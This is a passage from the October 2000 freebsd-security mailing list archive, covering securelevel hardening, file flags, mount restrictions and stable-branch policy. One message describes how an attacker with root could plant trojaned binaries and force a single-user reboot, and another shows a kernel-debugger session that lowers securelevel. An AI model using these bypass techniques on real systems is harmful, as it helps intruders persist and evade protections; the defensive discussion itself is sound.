with OSSH and if NetBSD's version happens to be compat fine if not > > too bad so sad. This whole thing really annoys me. But I am curious about > > others thoughts. > > I didn't know they have decided to fork their own version - all I've > seen in their cvs logs is integration of the openbsd version. At any > rate, I will be continuing to track the openbsd version, and > compatability is something which the open and netbsd guys will have to > work out for themselves. They've imported OpenSSH while they develop their own ``cleancode'' implmentation (I think that was the terminology they used). > Kris > > -- > In God we Trust -- all others must submit an X.509 certificate. > -- Charles Forsythe -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 20:10:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp4.port.ru (mx5.port.ru [194.67.23.40]) by hub.freebsd.org (Postfix) with ESMTP id 9C56037B503 for ; Wed, 4 Oct 2000 20:10:35 -0700 (PDT) Received: from [195.162.49.72] (helo=sorhed) by smtp4.port.ru with smtp (Exim 3.14 #27) id 13h1QX-0006OH-00 for security@freebsd.org; Thu, 05 Oct 2000 07:10:33 +0400 Message-ID: <002c01c02e82$529cae40$3431a2c3@sorhed> From: "Alexander Temerev" To: Subject: unsubscribe Date: Thu, 5 Oct 2000 10:11:20 +0600 MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Fidolook Express 2.000 for MS OE5 Organization: Fidolook Express 2.000 www.fidolook.da.ru Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 21:56:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222]) by hub.freebsd.org (Postfix) with ESMTP id 2373C37B503 for ; Wed, 4 Oct 2000 21:56:25 -0700 (PDT) Received: (from docs@localhost) by mailer.progressive-comp.com with id AAA32275; Thu, 5 Oct 2000 00:53:21 -0400 Date: Thu, 5 Oct 2000 00:53:21 -0400 Message-Id: <200010050453.AAA32275@mailer.progressive-comp.com> From: Hank Leininger Reply-To: Hank Leininger To: freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) X-Shameless-Plug: Check out http://marc.theaimsgroup.com/ X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com X-Warning: Report any violation of list policy to abuse@progressive-comp.com X-Posted-By: Hank Leininger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2000-10-05, Dima Dorfman wrote: > > On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote: > > Except you can still just mount a doctored copy over the top of it > Actually, now that I think about it, this can be detered to a certain > point. If you're running with securelevel >= 2, you can't load KLDs, > and you can't run newfs. What would you mount? A vn device? Nope, > unless the KLD is already loaded. A floppy? If you have physical Perhaps this is a stupid question, but why is mount particularly needed at high securelevels? So long as unmount(2) can be called by shutdown scripts. Hm... remounting / ro before halt/reboot perhaps... but perhaps that behavior could be straightforward-ly special cased? It's not like mount(2) is a hot path =) And/or, disallow mounts to mount points which are not regular, empty directories, if securelevel >= 2? What legit uses (that could not be learned around by an admin) would this break? -- Hank Leininger To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 22: 9:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id 810DC37B502; Wed, 4 Oct 2000 22:09:13 -0700 (PDT) Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id WAA50485; Wed, 4 Oct 2000 22:09:06 -0700 (PDT) (envelope-from obrien) Date: Wed, 4 Oct 2000 22:09:06 -0700 From: "David O'Brien" To: Paul Richards Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004220906.D50210@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org References: <83262.970607906@winston.osd.bsdi.com> <39DA6055.594B13E4@originative.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <39DA6055.594B13E4@originative.co.uk>; from paul@originative.co.uk on Tue, Oct 03, 2000 at 11:40:21PM +0100 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote: > Stable would stagnate to some extent, certainly more so than it > presently does, but I think that's exactly what should happen to a > stable branch. I disagree that a stable branch should stagnate to some extent -- so how how do we come to a meeting of the minds? -- -- David (obrien@FreeBSD.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 22:10:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222]) by hub.freebsd.org (Postfix) with ESMTP id 21E7737B502 for ; Wed, 4 Oct 2000 22:10:40 -0700 (PDT) Received: (from docs@localhost) by mailer.progressive-comp.com with id BAA00326; Thu, 5 Oct 2000 01:07:42 -0400 Date: Thu, 5 Oct 2000 01:07:42 -0400 Message-Id: <200010050507.BAA00326@mailer.progressive-comp.com> From: Hank Leininger Reply-To: Hank Leininger To: freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) X-Shameless-Plug: Check out http://marc.theaimsgroup.com/ X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com X-Warning: Report any violation of list policy to abuse@progressive-comp.com X-Posted-By: Hank Leininger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2000-10-05, Hank Leininger wrote: > at high securelevels? So long as unmount(2) can be called by shutdown Duh, s/un/u/. Need coffee. -- Hank Leininger To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 22:15:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 1734A37B66D for ; Wed, 4 Oct 2000 22:15:22 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id C907D1F21; Wed, 4 Oct 2000 22:15:21 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: <200010050453.AAA32275@mailer.progressive-comp.com> from Hank Leininger at "Oct 5, 2000 00:53:21 am" To: Hank Leininger Date: Wed, 4 Oct 2000 22:15:21 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001005051521.C907D1F21@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On 2000-10-05, Dima Dorfman wrote: > > > > On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote: > > > Except you can still just mount a doctored copy over the top of it > > > Actually, now that I think about it, this can be detered to a certain > > point. If you're running with securelevel >= 2, you can't load KLDs, > > and you can't run newfs. What would you mount? A vn device? Nope, > > unless the KLD is already loaded. A floppy? If you have physical > > Perhaps this is a stupid question, but why is mount particularly needed at > high securelevels? So long as unmount(2) can be called by shutdown > scripts. Hm... remounting / ro before halt/reboot perhaps... but perhaps > that behavior could be straightforward-ly special cased? It's not like > mount(2) is a hot path =) And/or, disallow mounts to mount points which > are not regular, empty directories, if securelevel >= 2? What legit uses > (that could not be learned around by an admin) would this break? Disallowing mounts altogether will break on-request mounting of volumes by things like amd(8), which is quite important, IMO. Disallowing mounts on non-empty directories and other "irregular" files is another story. While there are some legitimate uses for this, they are far less common. Regards -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "War doesn't determine who's right, it determines who's left." -- Confuscious To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 22:19:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id 1B6C537B503; Wed, 4 Oct 2000 22:19:38 -0700 (PDT) Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id WAA50552; Wed, 4 Oct 2000 22:19:21 -0700 (PDT) (envelope-from obrien) Date: Wed, 4 Oct 2000 22:19:21 -0700 From: "David O'Brien" To: Alfred Perlstein Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004221921.F50210@dragon.nuxi.com> Reply-To: obrien@FreeBSD.ORG References: <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> <20001003164236.Q27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001003164236.Q27736@fw.wintelcom.net>; from bright@wintelcom.net on Tue, Oct 03, 2000 at 04:42:37PM -0700 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 04:42:37PM -0700, Alfred Perlstein wrote: > There's a large difference between kernel and userland here, kernel > changes need to be backported relatively quickly while userland > can allow for a longer test period. Why is that -- I would almost say the opposite as the kernel is [generally] more complex than userland. -- -- David (obrien@FreeBSD.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 22:23:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id BAC2A37B502; Wed, 4 Oct 2000 22:23:29 -0700 (PDT) Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id WAA50572; Wed, 4 Oct 2000 22:23:22 -0700 (PDT) (envelope-from obrien) Date: Wed, 4 Oct 2000 22:23:21 -0700 From: "David O'Brien" To: "Jeffrey J. Mountin" Cc: cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004222321.G50210@dragon.nuxi.com> Reply-To: obrien@FreeBSD.ORG References: <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <39DA182C.C70ED553@originative.co.uk> <200010031800.MAA27859@harmony.village.org> <20001003162720.D51546@freefall.freebsd.org> <39DAC368.C6C213B7@newsguy.com> <4.3.2.20001004010120.00b1cb50@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <4.3.2.20001004010120.00b1cb50@207.227.119.2>; from jeff-ml@mountin.net on Wed, Oct 04, 2000 at 01:35:21AM -0500 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 01:35:21AM -0500, Jeffrey J. Mountin wrote: > >I don't think the comparision is appropriate. The divergence between 3.x > >and 4.x came at the very beginning of 3.x's life, and it was not merged > >back because it was too big a change. > > Aren't the SMP changes in -current similar and will reduce the amount of > code that can be backported to -stable with relative ease. Yes. People have been much worse at kernel MFC'ing than userland. You've had several people who feel qualified to do userland MFC'ing, but few feel qualified to do kernel stuff -- we could get rid of some of the diffs if someone confident in doing so spent a little time on it. -- -- David (obrien@FreeBSD.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 22:32:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from jason.argos.org (a1-3a105.neo.rr.com [24.93.180.105]) by hub.freebsd.org (Postfix) with ESMTP id F24B037B502 for ; Wed, 4 Oct 2000 22:32:19 -0700 (PDT) Received: from localhost (mike@localhost) by jason.argos.org (8.10.1/8.10.1) with ESMTP id e955Qxl17940; Thu, 5 Oct 2000 01:27:02 -0400 Date: Thu, 5 Oct 2000 01:26:59 -0400 (EDT) From: Mike Nowlin To: Gabriel Ambuehl Cc: security@FreeBSD.ORG Subject: Re: Re[2]: BSD chpass (fwd) In-Reply-To: <12917380571.20001004204942@buz.ch> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Wednesday, October 04, 2000, 12:08:59 PM, you wrote: > > of the script kid population). A really clever attacker would modify > > your securelevel settings in rc.conf, reboot the machine making it > > look like a panic or power surge > > What about setting schg for it as well? You'd just need to find a way > to change it yourself (not sure about it, but it should be changeable > in single user mode which is fortunately only controllable by the > console). Many moons ago, I was poking around in the securelevel "setting" code, and had an idea... (Ding!) How about some hardware flag (such as a bit on the game port connected to a one-shot 555 timer or something) that, when set, will allow you to lower the secure level w/o rebooting? Hit the button, the bit goes low, and you have 15 seconds to lower the securelevel before the bit goes high again and blocks the change (default action). Could also be wired to the (rather pointless) turbo switch that is still being put on a lot of cases... Yes? No? Stupid idea? --mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 22:41:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8E71337B503 for ; Wed, 4 Oct 2000 22:41:05 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e955emM19869; Wed, 4 Oct 2000 23:40:49 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id XAA54442; Wed, 4 Oct 2000 23:40:48 -0600 (MDT) Message-Id: <200010050540.XAA54442@harmony.village.org> To: Mike Nowlin Subject: Re: Re[2]: BSD chpass (fwd) Cc: Gabriel Ambuehl , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 05 Oct 2000 01:26:59 EDT." References: Date: Wed, 04 Oct 2000 23:40:48 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mike Nowlin writes: : How about some hardware flag (such as a bit on the game port connected to : a one-shot 555 timer or something) that, when set, will allow you to lower : the secure level w/o rebooting? Hit the button, the bit goes low, and you : have 15 seconds to lower the securelevel before the bit goes high again : and blocks the change (default action). Could also be wired to the : (rather pointless) turbo switch that is still being put on a lot of : cases... : : Yes? No? Stupid idea? Usually they are called "Joysticks" :-) One could hack the joy driver to allow this. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 23:11:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 2690C37B503; Wed, 4 Oct 2000 23:11:27 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e956BQt12423; Wed, 4 Oct 2000 23:11:26 -0700 (PDT) Date: Wed, 4 Oct 2000 23:11:26 -0700 From: Alfred Perlstein To: "David O'Brien" Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004231126.T27736@fw.wintelcom.net> References: <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> <20001003164236.Q27736@fw.wintelcom.net> <20001004221921.F50210@dragon.nuxi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <20001004221921.F50210@dragon.nuxi.com>; from obrien@FreeBSD.ORG on Wed, Oct 04, 2000 at 10:19:21PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * David O'Brien [001004 22:19] wrote: > On Tue, Oct 03, 2000 at 04:42:37PM -0700, Alfred Perlstein wrote: > > There's a large difference between kernel and userland here, kernel > > changes need to be backported relatively quickly while userland > > can allow for a longer test period. > > > Why is that -- I would almost say the opposite as the kernel is > [generally] more complex than userland. Several reasons: The kernel is one giant program and keeping it in relative sync is hard. (let's avoid the problems we had with 3.x) The kernel is more complex than userland, but since it's mostly self contained and doesn't do a lot of string parsing (which is where the majority of these vulnerabilities occur) it is actually easier to see what's going on, at least for me. There's a much heavier amount of peer review for core subsystems in the kernel. (sometimes it feels like a bit too much) The complexity of the kernel forces you to understand a great deal more about the internal interactions of various subsystems. It also does allow us to catch certain errors from our users tracking stable, while not an ideal way to find bugs (and definitely not the prefered way) it's better to have these things reach a wider audiance sooner so that the problem can be isolated. We _can_ back things out and we do have a good track record of restabilizing once a problem is found. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 23:26:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222]) by hub.freebsd.org (Postfix) with ESMTP id A969D37B503 for ; Wed, 4 Oct 2000 23:26:45 -0700 (PDT) Received: (from docs@localhost) by mailer.progressive-comp.com with id CAA05646; Thu, 5 Oct 2000 02:23:42 -0400 Date: Thu, 5 Oct 2000 02:23:42 -0400 Message-Id: <200010050623.CAA05646@mailer.progressive-comp.com> From: Hank Leininger Reply-To: Hank Leininger To: freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) X-Shameless-Plug: Check out http://marc.theaimsgroup.com/ X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com X-Warning: Report any violation of list policy to abuse@progressive-comp.com X-Posted-By: Hank Leininger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2000-10-04, Kris Kennaway wrote: > On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote: > > < > > said: > > > I think you're right. Which is a good reason why your /usr/bin > > > should be schg too ;-) > > > > Actually, sappnd on all the directories which might be in (or on the > > way to) root's path would be enough. > Except you can still just mount a doctored copy over the top of it :-) Keep in mind that a patient attacker can simply leave an egg and wait for you to boot single-user. For instance, suppose /bin is in root's path before /usr/bin, both are sappnd (but not schg), and we've been careful with schg'ing rc scripts (and all commands they call), somehow ruled out other nice mount(2) games, etc. If one's gotten root on such a system with securelevel raised, simply place a trojan'ed 'more', 'head', 'tail', or even 'vi' binary in /bin and wait for the next time the box is rebooted single-user and root logs in w/o securelevel raised (they could accelerate matters by subsequently feeding overrun-looking logs to syslog and/or crashing the box, causing curious admins to boot single-user and investigate, tail logfiles, etc). Does everybody type the full path to every executable they run every time? Doubtful ;) I've a feeling I'm (re)stating the obvious, but IMHO securelevels can't really permanently preserve a system's known-good state in the face of root compromise unless literally everything you'd ever access w/o securelevels raised, is fully protected when they are (in which case you'll effectively have everything interesting RO -- just set the RO jumper on the drive while you're at it). Otherwise there will always(?) be some extra-mile way to circumvent them. Of course we can devise countermeasures ad-nauseum -- for instance, set all dirs in root's path to schg and only set sappnd on the "last" one, and never change the order (silly). Or from every directory "higher" in the path than a path'ed command, create a symlink to the right place (unspeakably ugly, but works ;) Though you'll still have the 'sl', 'ls-l', etc trojan possibilities either way. And this isn't to say that I think securelevel efforts are wasted. The bar is raised; this is good, period ("how much higher is it when you are done" is still an open question though IMHO). Userland integrity checkers a la tripwire are useful again in a system which can guarantee a)without a reboot, the kernel cannot be modified nor raw-device disk or memory access obtained, and b)at least some minimal set of files (the static binaries, and their config/database files) have not been tampered with in any way. Without these, LKM-based rootkits make traditional integrity checkers pretty useless. ...A system whose integrity checkers are properly preserved can be expected to work as advertised (until reboot ;). One which alerted on the addition of new binaries would detect the above. Unless the attacker places the egg and then halts the box quickly enough that the integrity checker doesn't get a chance to run before the crash, and the admin checks things out booted to single-user mode, when it may not have launched yet... -- Hank Leininger To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 23:43:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 2286037B502 for ; Wed, 4 Oct 2000 23:43:42 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Wed, 4 Oct 2000 23:42:25 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e956hPT84928; Wed, 4 Oct 2000 23:43:25 -0700 (PDT) (envelope-from cjc) Date: Wed, 4 Oct 2000 23:43:25 -0700 From: "Crist J . Clark" To: "Jacques A. Vidrine" , freebsd-security@freebsd.org Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL Message-ID: <20001004234325.E25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <20001004084729.C25121@149.211.6.64.reflexcom.com> <20001004114308.B23379@hamlet.nectar.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001004114308.B23379@hamlet.nectar.com>; from n@nectar.com on Wed, Oct 04, 2000 at 11:43:08AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 11:43:08AM -0500, Jacques A. Vidrine wrote: > On Wed, Oct 04, 2000 at 08:47:29AM -0700, Crist J . Clark wrote: > > This was posted to BugTraq yesterday. It is a series of patches to > > restrict certain information from non-priv'ed users. > > man jail I should have put the original author of the scripts in the mail so he would get the replies. I just posted them since I thought they would be of interest and was curious about what others thought of the idea. Since I am not running any multi-user machines right now, they are not of particular interest to me. But anyway, jail(8) is a very different beast from the patches. It is not practical to put each interactive user in a jail for, say, a several dozen or several hundered user system. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 0: 0:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id 042DA37B502; Thu, 5 Oct 2000 00:00:47 -0700 (PDT) Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id AAA56587; Thu, 5 Oct 2000 00:00:45 -0700 (PDT) (envelope-from obrien) Date: Thu, 5 Oct 2000 00:00:44 -0700 From: "David O'Brien" To: Alfred Perlstein Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001005000044.C56495@dragon.nuxi.com> Reply-To: obrien@FreeBSD.ORG References: <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> <20001003164236.Q27736@fw.wintelcom.net> <20001004221921.F50210@dragon.nuxi.com> <20001004231126.T27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001004231126.T27736@fw.wintelcom.net>; from bright@wintelcom.net on Wed, Oct 04, 2000 at 11:11:26PM -0700 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 11:11:26PM -0700, Alfred Perlstein wrote: > The kernel is one giant program and keeping it in relative sync is > hard. (let's avoid the problems we had with 3.x) > > The kernel is more complex than userland, but since it's mostly Yes, and since it is hard, it should not be rushed. (Not that we've done a very good job of MFC'ing into RELENG_4). This thread has the common theme of being cautious. > self contained and doesn't do a lot of string parsing (which is > where the majority of these vulnerabilities occur) it is actually > easier to see what's going on, at least for me. ONLY for one class of vulnerabilities -- buffer overflows. What about the easy to guess sequence numbers? Or the whole class of denial of service. There are more vulnerabilities in the world than just buffer overflows. > The complexity of the kernel forces you to understand a great deal > more about the internal interactions of various subsystems. And I can point to a few MFC that happened too fast in kernel code that caused real problems -- even in RELENG_4. > We _can_ back things out and we do have a good track record of > restabilizing once a problem is found. IMHO, nothing MFC'ed into -stable should ever need to be backed out. IF the need arises that means we did a very poor job of MFC'ing. -- -- David (obrien@FreeBSD.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 3: 6:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id CEEAD37B502; Thu, 5 Oct 2000 03:06:48 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id GAA08750; Thu, 5 Oct 2000 06:06:52 -0400 (EDT) (envelope-from rjh@mohawk.net) Date: Thu, 5 Oct 2000 06:06:52 -0400 (EDT) From: Ralph Huntington To: "David O'Brien" Cc: Paul Richards , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Stable branch In-Reply-To: <20001004220906.D50210@dragon.nuxi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote: > > Stable would stagnate to some extent, certainly more so than it On Wed, 4 Oct 2000, David O'Brien wrote: > I disagree that a stable branch should stagnate to some extent -- so how Stable branch is very important for production use and should incorporate bug fixes and security patches, but not feature enhancements. The extent of support and maintenance for stable should be one major release prior to the latest release (not current), i.e., since 4.x-RELEASE is the latest, then 3.x-STABLE hould be supported with bug fixes and security patches until a 5.x-RELEASE is out. Does this seem unreasonable? -=r=- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 3:56:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail2.netcologne.de (mail2.netcologne.de [194.8.194.103]) by hub.freebsd.org (Postfix) with ESMTP id E0B6237B502 for ; Thu, 5 Oct 2000 03:56:46 -0700 (PDT) Received: from bagabeedaboo.security.at12.de (dial-213-168-64-127.netcologne.de [213.168.64.127]) by mail2.netcologne.de (8.9.3/8.9.3) with ESMTP id MAA00426; Thu, 5 Oct 2000 12:56:33 +0200 (MET DST) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by bagabeedaboo.security.at12.de (8.11.0/8.11.0) with ESMTP id e95AuMx01299; Thu, 5 Oct 2000 12:56:22 +0200 (CEST) (envelope-from pherman@frenchfries.net) Date: Thu, 5 Oct 2000 12:56:22 +0200 (CEST) From: Paul Herman To: Warner Losh Cc: Mike Nowlin , Gabriel Ambuehl , security@FreeBSD.ORG Subject: Re: Re[2]: BSD chpass (fwd) In-Reply-To: <200010050540.XAA54442@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Warner Losh wrote: > In message Mike Nowlin writes: > : How about some hardware flag (such as a bit on the game port connected to > : a one-shot 555 timer or something) that, when set, will allow you to lower > : the secure level w/o rebooting? > : > : Yes? No? Stupid idea? > > Usually they are called "Joysticks" :-) One could hack the joy driver > to allow this. The joystick definately has the geek factor going for it, but I just use DDB: bash-2.04$ Debugger("manual escape to debugger") Stopped at Debugger+0x34: movb $0,in_Debugger.396 db> w securelevel 0xffffffff securelevel 0x2 = 0xffffffff db> c Who needs sysctl(8)? :-) -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the 